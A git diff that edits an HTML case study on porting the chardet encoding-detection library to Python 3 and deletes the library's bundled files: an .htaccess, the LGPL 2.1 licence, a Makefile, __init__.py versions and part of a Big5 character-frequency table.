diff --git a/case-study-porting-chardet-to-python-3.html b/case-study-porting-chardet-to-python-3.html index 3d906d3..54b555e 100644 --- a/case-study-porting-chardet-to-python-3.html +++ b/case-study-porting-chardet-to-python-3.html @@ -44,8 +44,7 @@ del{background:#f87}

Introducing The chardet Module

-

[FIXME download link, possibly on chardet.feedparser.org, possibly local] -

Before we set off porting the code, it would help if you understood how the code worked! This is a brief guide to navigating the code itself. +

Before we set off porting the code, it would help if you understood how the code worked! This is a brief guide to navigating the code itself. The chardet library is too large to include inline here, but you can download it from chardet.feedparser.org.

The main entry point for the detection algorithm is universaldetector.py, which has one class, UniversalDetector. (You might think the main entry point is the detect function in chardet/__init__.py, but that’s really just a convenience function that creates a UniversalDetector object, calls it, and returns its result.)

There are 5 categories of encodings that UniversalDetector handles: diff --git a/chardet/.htaccess b/chardet/.htaccess deleted file mode 100644 index a214a2f..0000000 --- a/chardet/.htaccess +++ /dev/null @@ -1,13 +0,0 @@ -Options -Indexes +IncludesNoExec +ExecCGI - -AddHandler cgi-script .cgi - -RemoveOutputFilter .js -SetEnvIfNoCase Request_URI \.js$ no-gzip dont-vary - -AddType text/html;charset=utf-8 .html -AddHandler server-parsed .html -#XBitHack full - -AddType application/xml .xml -AddType text/plain .py diff --git a/chardet/COPYING b/chardet/COPYING deleted file mode 100644 index 8add30a..0000000 --- a/chardet/COPYING +++ /dev/null @@ -1,504 +0,0 @@ - GNU LESSER GENERAL PUBLIC LICENSE - Version 2.1, February 1999 - - Copyright (C) 1991, 1999 Free Software Foundation, Inc. - 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA - Everyone is permitted to copy and distribute verbatim copies - of this license document, but changing it is not allowed. - -[This is the first released version of the Lesser GPL. It also counts - as the successor of the GNU Library Public License, version 2, hence - the version number 2.1.] - - Preamble - - The licenses for most software are designed to take away your -freedom to share and change it. By contrast, the GNU General Public -Licenses are intended to guarantee your freedom to share and change -free software--to make sure the software is free for all its users. - - This license, the Lesser General Public License, applies to some -specially designated software packages--typically libraries--of the -Free Software Foundation and other authors who decide to use it. You -can use it too, but we suggest you first think carefully about whether -this license or the ordinary General Public License is the better -strategy to use in any particular case, based on the explanations below. - - When we speak of free software, we are referring to freedom of use, -not price. Our General Public Licenses are designed to make sure that -you have the freedom to distribute copies of free software (and charge -for this service if you wish); that you receive source code or can get -it if you want it; that you can change the software and use pieces of -it in new free programs; and that you are informed that you can do -these things. - - To protect your rights, we need to make restrictions that forbid -distributors to deny you these rights or to ask you to surrender these -rights. These restrictions translate to certain responsibilities for -you if you distribute copies of the library or if you modify it. - - For example, if you distribute copies of the library, whether gratis -or for a fee, you must give the recipients all the rights that we gave -you. You must make sure that they, too, receive or can get the source -code. If you link other code with the library, you must provide -complete object files to the recipients, so that they can relink them -with the library after making changes to the library and recompiling -it. And you must show them these terms so they know their rights. - - We protect your rights with a two-step method: (1) we copyright the -library, and (2) we offer you this license, which gives you legal -permission to copy, distribute and/or modify the library. - - To protect each distributor, we want to make it very clear that -there is no warranty for the free library. Also, if the library is -modified by someone else and passed on, the recipients should know -that what they have is not the original version, so that the original -author's reputation will not be affected by problems that might be -introduced by others. - - Finally, software patents pose a constant threat to the existence of -any free program. We wish to make sure that a company cannot -effectively restrict the users of a free program by obtaining a -restrictive license from a patent holder. Therefore, we insist that -any patent license obtained for a version of the library must be -consistent with the full freedom of use specified in this license. - - Most GNU software, including some libraries, is covered by the -ordinary GNU General Public License. This license, the GNU Lesser -General Public License, applies to certain designated libraries, and -is quite different from the ordinary General Public License. We use -this license for certain libraries in order to permit linking those -libraries into non-free programs. - - When a program is linked with a library, whether statically or using -a shared library, the combination of the two is legally speaking a -combined work, a derivative of the original library. The ordinary -General Public License therefore permits such linking only if the -entire combination fits its criteria of freedom. The Lesser General -Public License permits more lax criteria for linking other code with -the library. - - We call this license the "Lesser" General Public License because it -does Less to protect the user's freedom than the ordinary General -Public License. It also provides other free software developers Less -of an advantage over competing non-free programs. These disadvantages -are the reason we use the ordinary General Public License for many -libraries. However, the Lesser license provides advantages in certain -special circumstances. - - For example, on rare occasions, there may be a special need to -encourage the widest possible use of a certain library, so that it becomes -a de-facto standard. To achieve this, non-free programs must be -allowed to use the library. A more frequent case is that a free -library does the same job as widely used non-free libraries. In this -case, there is little to gain by limiting the free library to free -software only, so we use the Lesser General Public License. - - In other cases, permission to use a particular library in non-free -programs enables a greater number of people to use a large body of -free software. For example, permission to use the GNU C Library in -non-free programs enables many more people to use the whole GNU -operating system, as well as its variant, the GNU/Linux operating -system. - - Although the Lesser General Public License is Less protective of the -users' freedom, it does ensure that the user of a program that is -linked with the Library has the freedom and the wherewithal to run -that program using a modified version of the Library. - - The precise terms and conditions for copying, distribution and -modification follow. Pay close attention to the difference between a -"work based on the library" and a "work that uses the library". The -former contains code derived from the library, whereas the latter must -be combined with the library in order to run. - - GNU LESSER GENERAL PUBLIC LICENSE - TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION - - 0. This License Agreement applies to any software library or other -program which contains a notice placed by the copyright holder or -other authorized party saying it may be distributed under the terms of -this Lesser General Public License (also called "this License"). -Each licensee is addressed as "you". - - A "library" means a collection of software functions and/or data -prepared so as to be conveniently linked with application programs -(which use some of those functions and data) to form executables. - - The "Library", below, refers to any such software library or work -which has been distributed under these terms. A "work based on the -Library" means either the Library or any derivative work under -copyright law: that is to say, a work containing the Library or a -portion of it, either verbatim or with modifications and/or translated -straightforwardly into another language. (Hereinafter, translation is -included without limitation in the term "modification".) - - "Source code" for a work means the preferred form of the work for -making modifications to it. For a library, complete source code means -all the source code for all modules it contains, plus any associated -interface definition files, plus the scripts used to control compilation -and installation of the library. - - Activities other than copying, distribution and modification are not -covered by this License; they are outside its scope. The act of -running a program using the Library is not restricted, and output from -such a program is covered only if its contents constitute a work based -on the Library (independent of the use of the Library in a tool for -writing it). Whether that is true depends on what the Library does -and what the program that uses the Library does. - - 1. You may copy and distribute verbatim copies of the Library's -complete source code as you receive it, in any medium, provided that -you conspicuously and appropriately publish on each copy an -appropriate copyright notice and disclaimer of warranty; keep intact -all the notices that refer to this License and to the absence of any -warranty; and distribute a copy of this License along with the -Library. - - You may charge a fee for the physical act of transferring a copy, -and you may at your option offer warranty protection in exchange for a -fee. - - 2. You may modify your copy or copies of the Library or any portion -of it, thus forming a work based on the Library, and copy and -distribute such modifications or work under the terms of Section 1 -above, provided that you also meet all of these conditions: - - a) The modified work must itself be a software library. - - b) You must cause the files modified to carry prominent notices - stating that you changed the files and the date of any change. - - c) You must cause the whole of the work to be licensed at no - charge to all third parties under the terms of this License. - - d) If a facility in the modified Library refers to a function or a - table of data to be supplied by an application program that uses - the facility, other than as an argument passed when the facility - is invoked, then you must make a good faith effort to ensure that, - in the event an application does not supply such function or - table, the facility still operates, and performs whatever part of - its purpose remains meaningful. - - (For example, a function in a library to compute square roots has - a purpose that is entirely well-defined independent of the - application. Therefore, Subsection 2d requires that any - application-supplied function or table used by this function must - be optional: if the application does not supply it, the square - root function must still compute square roots.) - -These requirements apply to the modified work as a whole. If -identifiable sections of that work are not derived from the Library, -and can be reasonably considered independent and separate works in -themselves, then this License, and its terms, do not apply to those -sections when you distribute them as separate works. But when you -distribute the same sections as part of a whole which is a work based -on the Library, the distribution of the whole must be on the terms of -this License, whose permissions for other licensees extend to the -entire whole, and thus to each and every part regardless of who wrote -it. - -Thus, it is not the intent of this section to claim rights or contest -your rights to work written entirely by you; rather, the intent is to -exercise the right to control the distribution of derivative or -collective works based on the Library. - -In addition, mere aggregation of another work not based on the Library -with the Library (or with a work based on the Library) on a volume of -a storage or distribution medium does not bring the other work under -the scope of this License. - - 3. You may opt to apply the terms of the ordinary GNU General Public -License instead of this License to a given copy of the Library. To do -this, you must alter all the notices that refer to this License, so -that they refer to the ordinary GNU General Public License, version 2, -instead of to this License. (If a newer version than version 2 of the -ordinary GNU General Public License has appeared, then you can specify -that version instead if you wish.) Do not make any other change in -these notices. - - Once this change is made in a given copy, it is irreversible for -that copy, so the ordinary GNU General Public License applies to all -subsequent copies and derivative works made from that copy. - - This option is useful when you wish to copy part of the code of -the Library into a program that is not a library. - - 4. You may copy and distribute the Library (or a portion or -derivative of it, under Section 2) in object code or executable form -under the terms of Sections 1 and 2 above provided that you accompany -it with the complete corresponding machine-readable source code, which -must be distributed under the terms of Sections 1 and 2 above on a -medium customarily used for software interchange. - - If distribution of object code is made by offering access to copy -from a designated place, then offering equivalent access to copy the -source code from the same place satisfies the requirement to -distribute the source code, even though third parties are not -compelled to copy the source along with the object code. - - 5. A program that contains no derivative of any portion of the -Library, but is designed to work with the Library by being compiled or -linked with it, is called a "work that uses the Library". Such a -work, in isolation, is not a derivative work of the Library, and -therefore falls outside the scope of this License. - - However, linking a "work that uses the Library" with the Library -creates an executable that is a derivative of the Library (because it -contains portions of the Library), rather than a "work that uses the -library". The executable is therefore covered by this License. -Section 6 states terms for distribution of such executables. - - When a "work that uses the Library" uses material from a header file -that is part of the Library, the object code for the work may be a -derivative work of the Library even though the source code is not. -Whether this is true is especially significant if the work can be -linked without the Library, or if the work is itself a library. The -threshold for this to be true is not precisely defined by law. - - If such an object file uses only numerical parameters, data -structure layouts and accessors, and small macros and small inline -functions (ten lines or less in length), then the use of the object -file is unrestricted, regardless of whether it is legally a derivative -work. (Executables containing this object code plus portions of the -Library will still fall under Section 6.) - - Otherwise, if the work is a derivative of the Library, you may -distribute the object code for the work under the terms of Section 6. -Any executables containing that work also fall under Section 6, -whether or not they are linked directly with the Library itself. - - 6. As an exception to the Sections above, you may also combine or -link a "work that uses the Library" with the Library to produce a -work containing portions of the Library, and distribute that work -under terms of your choice, provided that the terms permit -modification of the work for the customer's own use and reverse -engineering for debugging such modifications. - - You must give prominent notice with each copy of the work that the -Library is used in it and that the Library and its use are covered by -this License. You must supply a copy of this License. If the work -during execution displays copyright notices, you must include the -copyright notice for the Library among them, as well as a reference -directing the user to the copy of this License. Also, you must do one -of these things: - - a) Accompany the work with the complete corresponding - machine-readable source code for the Library including whatever - changes were used in the work (which must be distributed under - Sections 1 and 2 above); and, if the work is an executable linked - with the Library, with the complete machine-readable "work that - uses the Library", as object code and/or source code, so that the - user can modify the Library and then relink to produce a modified - executable containing the modified Library. (It is understood - that the user who changes the contents of definitions files in the - Library will not necessarily be able to recompile the application - to use the modified definitions.) - - b) Use a suitable shared library mechanism for linking with the - Library. A suitable mechanism is one that (1) uses at run time a - copy of the library already present on the user's computer system, - rather than copying library functions into the executable, and (2) - will operate properly with a modified version of the library, if - the user installs one, as long as the modified version is - interface-compatible with the version that the work was made with. - - c) Accompany the work with a written offer, valid for at - least three years, to give the same user the materials - specified in Subsection 6a, above, for a charge no more - than the cost of performing this distribution. - - d) If distribution of the work is made by offering access to copy - from a designated place, offer equivalent access to copy the above - specified materials from the same place. - - e) Verify that the user has already received a copy of these - materials or that you have already sent this user a copy. - - For an executable, the required form of the "work that uses the -Library" must include any data and utility programs needed for -reproducing the executable from it. However, as a special exception, -the materials to be distributed need not include anything that is -normally distributed (in either source or binary form) with the major -components (compiler, kernel, and so on) of the operating system on -which the executable runs, unless that component itself accompanies -the executable. - - It may happen that this requirement contradicts the license -restrictions of other proprietary libraries that do not normally -accompany the operating system. Such a contradiction means you cannot -use both them and the Library together in an executable that you -distribute. - - 7. You may place library facilities that are a work based on the -Library side-by-side in a single library together with other library -facilities not covered by this License, and distribute such a combined -library, provided that the separate distribution of the work based on -the Library and of the other library facilities is otherwise -permitted, and provided that you do these two things: - - a) Accompany the combined library with a copy of the same work - based on the Library, uncombined with any other library - facilities. This must be distributed under the terms of the - Sections above. - - b) Give prominent notice with the combined library of the fact - that part of it is a work based on the Library, and explaining - where to find the accompanying uncombined form of the same work. - - 8. You may not copy, modify, sublicense, link with, or distribute -the Library except as expressly provided under this License. Any -attempt otherwise to copy, modify, sublicense, link with, or -distribute the Library is void, and will automatically terminate your -rights under this License. However, parties who have received copies, -or rights, from you under this License will not have their licenses -terminated so long as such parties remain in full compliance. - - 9. You are not required to accept this License, since you have not -signed it. However, nothing else grants you permission to modify or -distribute the Library or its derivative works. These actions are -prohibited by law if you do not accept this License. Therefore, by -modifying or distributing the Library (or any work based on the -Library), you indicate your acceptance of this License to do so, and -all its terms and conditions for copying, distributing or modifying -the Library or works based on it. - - 10. Each time you redistribute the Library (or any work based on the -Library), the recipient automatically receives a license from the -original licensor to copy, distribute, link with or modify the Library -subject to these terms and conditions. You may not impose any further -restrictions on the recipients' exercise of the rights granted herein. -You are not responsible for enforcing compliance by third parties with -this License. - - 11. If, as a consequence of a court judgment or allegation of patent -infringement or for any other reason (not limited to patent issues), -conditions are imposed on you (whether by court order, agreement or -otherwise) that contradict the conditions of this License, they do not -excuse you from the conditions of this License. If you cannot -distribute so as to satisfy simultaneously your obligations under this -License and any other pertinent obligations, then as a consequence you -may not distribute the Library at all. For example, if a patent -license would not permit royalty-free redistribution of the Library by -all those who receive copies directly or indirectly through you, then -the only way you could satisfy both it and this License would be to -refrain entirely from distribution of the Library. - -If any portion of this section is held invalid or unenforceable under any -particular circumstance, the balance of the section is intended to apply, -and the section as a whole is intended to apply in other circumstances. - -It is not the purpose of this section to induce you to infringe any -patents or other property right claims or to contest validity of any -such claims; this section has the sole purpose of protecting the -integrity of the free software distribution system which is -implemented by public license practices. Many people have made -generous contributions to the wide range of software distributed -through that system in reliance on consistent application of that -system; it is up to the author/donor to decide if he or she is willing -to distribute software through any other system and a licensee cannot -impose that choice. - -This section is intended to make thoroughly clear what is believed to -be a consequence of the rest of this License. - - 12. If the distribution and/or use of the Library is restricted in -certain countries either by patents or by copyrighted interfaces, the -original copyright holder who places the Library under this License may add -an explicit geographical distribution limitation excluding those countries, -so that distribution is permitted only in or among countries not thus -excluded. In such case, this License incorporates the limitation as if -written in the body of this License. - - 13. The Free Software Foundation may publish revised and/or new -versions of the Lesser General Public License from time to time. -Such new versions will be similar in spirit to the present version, -but may differ in detail to address new problems or concerns. - -Each version is given a distinguishing version number. If the Library -specifies a version number of this License which applies to it and -"any later version", you have the option of following the terms and -conditions either of that version or of any later version published by -the Free Software Foundation. If the Library does not specify a -license version number, you may choose any version ever published by -the Free Software Foundation. - - 14. If you wish to incorporate parts of the Library into other free -programs whose distribution conditions are incompatible with these, -write to the author to ask for permission. For software which is -copyrighted by the Free Software Foundation, write to the Free -Software Foundation; we sometimes make exceptions for this. Our -decision will be guided by the two goals of preserving the free status -of all derivatives of our free software and of promoting the sharing -and reuse of software generally. - - NO WARRANTY - - 15. BECAUSE THE LIBRARY IS LICENSED FREE OF CHARGE, THERE IS NO -WARRANTY FOR THE LIBRARY, TO THE EXTENT PERMITTED BY APPLICABLE LAW. -EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR -OTHER PARTIES PROVIDE THE LIBRARY "AS IS" WITHOUT WARRANTY OF ANY -KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE -IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR -PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE -LIBRARY IS WITH YOU. SHOULD THE LIBRARY PROVE DEFECTIVE, YOU ASSUME -THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION. - - 16. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN -WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY -AND/OR REDISTRIBUTE THE LIBRARY AS PERMITTED ABOVE, BE LIABLE TO YOU -FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR -CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE -LIBRARY (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING -RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A -FAILURE OF THE LIBRARY TO OPERATE WITH ANY OTHER SOFTWARE), EVEN IF -SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH -DAMAGES. - - END OF TERMS AND CONDITIONS - - How to Apply These Terms to Your New Libraries - - If you develop a new library, and you want it to be of the greatest -possible use to the public, we recommend making it free software that -everyone can redistribute and change. You can do so by permitting -redistribution under these terms (or, alternatively, under the terms of the -ordinary General Public License). - - To apply these terms, attach the following notices to the library. It is -safest to attach them to the start of each source file to most effectively -convey the exclusion of warranty; and each file should have at least the -"copyright" line and a pointer to where the full notice is found. - - - Copyright (C) - - This library is free software; you can redistribute it and/or - modify it under the terms of the GNU Lesser General Public - License as published by the Free Software Foundation; either - version 2.1 of the License, or (at your option) any later version. - - This library is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - Lesser General Public License for more details. - - You should have received a copy of the GNU Lesser General Public - License along with this library; if not, write to the Free Software - Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA - -Also add information on how to contact you by electronic and paper mail. - -You should also get your employer (if you work as a programmer) or your -school, if any, to sign a "copyright disclaimer" for the library, if -necessary. Here is a sample; alter the names: - - Yoyodyne, Inc., hereby disclaims all copyright interest in the - library `Frob' (a library for tweaking knobs) written by James Random Hacker. - - , 1 April 1990 - Ty Coon, President of Vice - -That's all there is to it! - - diff --git a/chardet/Makefile b/chardet/Makefile deleted file mode 100644 index 4d19c97..0000000 --- a/chardet/Makefile +++ /dev/null @@ -1,53 +0,0 @@ -VERSION = 1.0.1 -PROJECT = chardet -XSLTPROC = xsltproc -XMLLINT = xmllint -PYTHON = python - -test: - ${PYTHON} test.py tests/**/* - -validate: - ${XMLLINT} --noout --valid docs/xml/${PROJECT}.xml - -.PHONY: docs - -docs: validate - cd docs; \ - ${XSLTPROC} xsl/html.xsl xml/${PROJECT}.xml; \ - ${PYTHON} ../util/colorize.py . 0; \ - cd .. - -clean: - rm -f *.pyc - rm -f ${PROJECT}/*.pyc - rm -f util/*.pyc - rm -rf build - rm -rf dist - rm -rf docs/dist - -maintainer-clean: clean - rm -f docs/*.html - -release-check: - ${PYTHON} util/releasecheck.py - -dist: validate - cd docs; \ - mkdir -p dist/docs/; \ - rsync -rtpz --exclude=.svn ../css dist/docs/; \ - rsync -rtpz --exclude=.svn images dist/docs/; \ - ${XSLTPROC} xsl/htmldist.xsl xml/${PROJECT}.xml; \ - ${PYTHON} ../util/colorize.py dist/docs/ 0; \ - cd .. - mkdir -p dist/${PROJECT}-${VERSION} - cp COPYING dist/${PROJECT}-${VERSION} - cp setup.py dist/${PROJECT}-${VERSION} - rsync -rtpz --exclude=*.svn* ${PROJECT} dist/${PROJECT}-${VERSION} - rsync -rtpz docs/dist/docs dist/${PROJECT}-${VERSION} - cd dist; \ - tar cfz ${PROJECT}-${VERSION}.tgz ${PROJECT}-${VERSION}; \ - cd .. - ls -l dist - -all: validate release-check maintainer-clean docs dist diff --git a/chardet/chardet/__init__.py b/chardet/chardet/__init__.py deleted file mode 100644 index c268dd3..0000000 --- a/chardet/chardet/__init__.py +++ /dev/null @@ -1,26 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -__version__ = "2.0.0" - -def detect(aBuf): - from . import universaldetector - u = universaldetector.UniversalDetector() - u.reset() - u.feed(aBuf) - u.close() - return u.result diff --git a/chardet/chardet/__init__.py.bak b/chardet/chardet/__init__.py.bak deleted file mode 100644 index b1872fe..0000000 --- a/chardet/chardet/__init__.py.bak +++ /dev/null @@ -1,26 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -__version__ = "1.0.1" - -def detect(aBuf): - import universaldetector - u = universaldetector.UniversalDetector() - u.reset() - u.feed(aBuf) - u.close() - return u.result diff --git a/chardet/chardet/__init__.pyc b/chardet/chardet/__init__.pyc deleted file mode 100644 index d5024df..0000000 Binary files a/chardet/chardet/__init__.pyc and /dev/null differ diff --git a/chardet/chardet/big5freq.py b/chardet/chardet/big5freq.py deleted file mode 100644 index c1b0f3c..0000000 --- a/chardet/chardet/big5freq.py +++ /dev/null @@ -1,923 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is Mozilla Communicator client code. -# -# The Initial Developer of the Original Code is -# Netscape Communications Corporation. -# Portions created by the Initial Developer are Copyright (C) 1998 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -# Big5 frequency table -# by Taiwan's Mandarin Promotion Council -# -# -# 128 --> 0.42261 -# 256 --> 0.57851 -# 512 --> 0.74851 -# 1024 --> 0.89384 -# 2048 --> 0.97583 -# -# Ideal Distribution Ratio = 0.74851/(1-0.74851) =2.98 -# Random Distribution Ration = 512/(5401-512)=0.105 -# -# Typical Distribution Ratio about 25% of Ideal one, still much higher than RDR - -BIG5_TYPICAL_DISTRIBUTION_RATIO = 0.75 - -#Char to FreqOrder table -BIG5_TABLE_SIZE = 5376 - -Big5CharToFreqOrder = ( \ - 1,1801,1506, 255,1431, 198, 9, 82, 6,5008, 177, 202,3681,1256,2821, 110, # 16 -3814, 33,3274, 261, 76, 44,2114, 16,2946,2187,1176, 659,3971, 26,3451,2653, # 32 -1198,3972,3350,4202, 410,2215, 302, 590, 361,1964, 8, 204, 58,4510,5009,1932, # 48 - 63,5010,5011, 317,1614, 75, 222, 159,4203,2417,1480,5012,3555,3091, 224,2822, # 64 -3682, 3, 10,3973,1471, 29,2787,1135,2866,1940, 873, 130,3275,1123, 312,5013, # 80 -4511,2052, 507, 252, 682,5014, 142,1915, 124, 206,2947, 34,3556,3204, 64, 604, # 96 -5015,2501,1977,1978, 155,1991, 645, 641,1606,5016,3452, 337, 72, 406,5017, 80, # 112 - 630, 238,3205,1509, 263, 939,1092,2654, 756,1440,1094,3453, 449, 69,2987, 591, # 128 - 179,2096, 471, 115,2035,1844, 60, 50,2988, 134, 806,1869, 734,2036,3454, 180, # 144 - 995,1607, 156, 537,2907, 688,5018, 319,1305, 779,2145, 514,2379, 298,4512, 359, # 160 -2502, 90,2716,1338, 663, 11, 906,1099,2553, 20,2441, 182, 532,1716,5019, 732, # 176 -1376,4204,1311,1420,3206, 25,2317,1056, 113, 399, 382,1950, 242,3455,2474, 529, # 192 -3276, 475,1447,3683,5020, 117, 21, 656, 810,1297,2300,2334,3557,5021, 126,4205, # 208 - 706, 456, 150, 613,4513, 71,1118,2037,4206, 145,3092, 85, 835, 486,2115,1246, # 224 -1426, 428, 727,1285,1015, 800, 106, 623, 303,1281,5022,2128,2359, 347,3815, 221, # 240 -3558,3135,5023,1956,1153,4207, 83, 296,1199,3093, 192, 624, 93,5024, 822,1898, # 256 -2823,3136, 795,2065, 991,1554,1542,1592, 27, 43,2867, 859, 139,1456, 860,4514, # 272 - 437, 712,3974, 164,2397,3137, 695, 211,3037,2097, 195,3975,1608,3559,3560,3684, # 288 -3976, 234, 811,2989,2098,3977,2233,1441,3561,1615,2380, 668,2077,1638, 305, 228, # 304 -1664,4515, 467, 415,5025, 262,2099,1593, 239, 108, 300, 200,1033, 512,1247,2078, # 320 -5026,5027,2176,3207,3685,2682, 593, 845,1062,3277, 88,1723,2038,3978,1951, 212, # 336 - 266, 152, 149, 468,1899,4208,4516, 77, 187,5028,3038, 37, 5,2990,5029,3979, # 352 -5030,5031, 39,2524,4517,2908,3208,2079, 55, 148, 74,4518, 545, 483,1474,1029, # 368 -1665, 217,1870,1531,3138,1104,2655,4209, 24, 172,3562, 900,3980,3563,3564,4519, # 384 - 32,1408,2824,1312, 329, 487,2360,2251,2717, 784,2683, 4,3039,3351,1427,1789, # 400 - 188, 109, 499,5032,3686,1717,1790, 888,1217,3040,4520,5033,3565,5034,3352,1520, # 416 -3687,3981, 196,1034, 775,5035,5036, 929,1816, 249, 439, 38,5037,1063,5038, 794, # 432 -3982,1435,2301, 46, 178,3278,2066,5039,2381,5040, 214,1709,4521, 804, 35, 707, # 448 - 324,3688,1601,2554, 140, 459,4210,5041,5042,1365, 839, 272, 978,2262,2580,3456, # 464 -2129,1363,3689,1423, 697, 100,3094, 48, 70,1231, 495,3139,2196,5043,1294,5044, # 480 -2080, 462, 586,1042,3279, 853, 256, 988, 185,2382,3457,1698, 434,1084,5045,3458, # 496 - 314,2625,2788,4522,2335,2336, 569,2285, 637,1817,2525, 757,1162,1879,1616,3459, # 512 - 287,1577,2116, 768,4523,1671,2868,3566,2526,1321,3816, 909,2418,5046,4211, 933, # 528 -3817,4212,2053,2361,1222,4524, 765,2419,1322, 786,4525,5047,1920,1462,1677,2909, # 544 -1699,5048,4526,1424,2442,3140,3690,2600,3353,1775,1941,3460,3983,4213, 309,1369, # 560 -1130,2825, 364,2234,1653,1299,3984,3567,3985,3986,2656, 525,1085,3041, 902,2001, # 576 -1475, 964,4527, 421,1845,1415,1057,2286, 940,1364,3141, 376,4528,4529,1381, 7, # 592 -2527, 983,2383, 336,1710,2684,1846, 321,3461, 559,1131,3042,2752,1809,1132,1313, # 608 - 265,1481,1858,5049, 352,1203,2826,3280, 167,1089, 420,2827, 776, 792,1724,3568, # 624 -4214,2443,3281,5050,4215,5051, 446, 229, 333,2753, 901,3818,1200,1557,4530,2657, # 640 -1921, 395,2754,2685,3819,4216,1836, 125, 916,3209,2626,4531,5052,5053,3820,5054, # 656 -5055,5056,4532,3142,3691,1133,2555,1757,3462,1510,2318,1409,3569,5057,2146, 438, # 672 -2601,2910,2384,3354,1068, 958,3043, 461, 311,2869,2686,4217,1916,3210,4218,1979, # 688 - 383, 750,2755,2627,4219, 274, 539, 385,1278,1442,5058,1154,1965, 384, 561, 210, # 704 - 98,1295,2556,3570,5059,1711,2420,1482,3463,3987,2911,1257, 129,5060,3821, 642, # 720 - 523,2789,2790,2658,5061, 141,2235,1333, 68, 176, 441, 876, 907,4220, 603,2602, # 736 - 710, 171,3464, 404, 549, 18,3143,2398,1410,3692,1666,5062,3571,4533,2912,4534, # 752 -5063,2991, 368,5064, 146, 366, 99, 871,3693,1543, 748, 807,1586,1185, 22,2263, # 768 - 379,3822,3211,5065,3212, 505,1942,2628,1992,1382,2319,5066, 380,2362, 218, 702, # 784 -1818,1248,3465,3044,3572,3355,3282,5067,2992,3694, 930,3283,3823,5068, 59,5069, # 800 - 585, 601,4221, 497,3466,1112,1314,4535,1802,5070,1223,1472,2177,5071, 749,1837, # 816 - 690,1900,3824,1773,3988,1476, 429,1043,1791,2236,2117, 917,4222, 447,1086,1629, # 832 -5072, 556,5073,5074,2021,1654, 844,1090, 105, 550, 966,1758,2828,1008,1783, 686, # 848 -1095,5075,2287, 793,1602,5076,3573,2603,4536,4223,2948,2302,4537,3825, 980,2503, # 864 - 544, 353, 527,4538, 908,2687,2913,5077, 381,2629,1943,1348,5078,1341,1252, 560, # 880 -3095,5079,3467,2870,5080,2054, 973, 886,2081, 143,4539,5081,5082, 157,3989, 496, # 896 -4224, 57, 840, 540,2039,4540,4541,3468,2118,1445, 970,2264,1748,1966,2082,4225, # 912 -3144,1234,1776,3284,2829,3695, 773,1206,2130,1066,2040,1326,3990,1738,1725,4226, # 928 - 279,3145, 51,1544,2604, 423,1578,2131,2067, 173,4542,1880,5083,5084,1583, 264, # 944 - 610,3696,4543,2444, 280, 154,5085,5086,5087,1739, 338,1282,3096, 693,2871,1411, # 960 -1074,3826,2445,5088,4544,5089,5090,1240, 952,2399,5091,2914,1538,2688, 685,1483, # 976 -4227,2475,1436, 953,4228,2055,4545, 671,2400, 79,4229,2446,3285, 608, 567,2689, # 992 -3469,4230,4231,1691, 393,1261,1792,2401,5092,4546,5093,5094,5095,5096,1383,1672, # 1008 -3827,3213,1464, 522,1119, 661,1150, 216, 675,4547,3991,1432,3574, 609,4548,2690, # 1024 -2402,5097,5098,5099,4232,3045, 0,5100,2476, 315, 231,2447, 301,3356,4549,2385, # 1040 -5101, 233,4233,3697,1819,4550,4551,5102, 96,1777,1315,2083,5103, 257,5104,1810, # 1056 